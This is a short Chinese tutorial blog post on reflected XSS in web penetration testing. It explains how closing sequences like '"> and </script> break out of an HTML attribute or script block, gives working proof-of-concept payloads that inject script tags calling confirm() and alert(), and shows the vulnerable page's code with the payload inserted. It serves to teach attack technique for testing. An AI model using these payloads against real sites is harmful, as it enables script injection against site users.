Web渗透测试之XSS跨站脚本之JS输出 以及 什么是闭合标签 一篇文章给你说明白

目录

闭合标签

XSS之js输出


闭合标签

  • 封闭标签 达到 让标签值不当成 一个属性值来展示 从而达到xss注入的效果

XML 复制代码
'"> 为了想办法闭合前面的标签,不用也行成功率高一些
攻击方法 '"><script>confirm(1)</script>,
  • 其中 '"> 我们称之为完成闭合符号,后面跟script标签来进行攻击,弹出了窗口表示我们的js代码被执行了。

  • 触发JS代码 生成XSS攻击


XSS之js输出

这个方式还是需要采用闭合的方式来进行使用 引号 闭合</script>

XML 复制代码
'</script><script>alert('this is my order')</script>>
复制代码
也就是在页面上输出 输出到js代码页面中去了 在js代码中执行
  • 查看页面源代码在查看js代码执行
  • 把前面的闭合 后面构造自己的js
XML 复制代码
<script>
    $ms=''</script><script>alert('this is my order')</script>>';
    if($ms.length != 0){
        if($ms == 'tmac'){
            $('#fromjs').text('tmac确实厉害,看那小眼神..')
        }else {
//            alert($ms);
            $('#fromjs').text('无论如何不要放弃心中所爱..')
        }

    }

相关推荐
Mapmost4 分钟前
地图引擎性能优化:解决3DTiles加载痛点的六大核心策略
前端
数字化脑洞实验室20 分钟前
选择AI决策解决方案需要注意哪些安全和数据隐私问题?
人工智能·安全
San30.24 分钟前
Ajax 数据请求:从 XMLHttpRequest 到现代前端数据交互的演进
前端·ajax·交互
Guheyunyi26 分钟前
安全风险监测系统核心技术
运维·网络·人工智能·安全
weixin_3077791326 分钟前
Amazon VPC中Web应用无法连接数据库的安全组配置问题分析与修复
网络·数据库·安全·云计算·aws
Lambor_Ma28 分钟前
【架构】安全(二)
安全
西西西西胡萝卜鸡34 分钟前
虚拟列表(Virtual List)组件实现与优化铁臂猿版(简易版)
前端·vue.js
宇余41 分钟前
Unibest:新一代uni-app工程化最佳实践指南
前端·vue.js
*小雪1 小时前
uniapp写H5授权登录及分享,返回到目标页面
开发语言·javascript·uni-app
性野喜悲1 小时前
ts+uniapp小程序时间日期选择框(分开选择)
前端·javascript·vue.js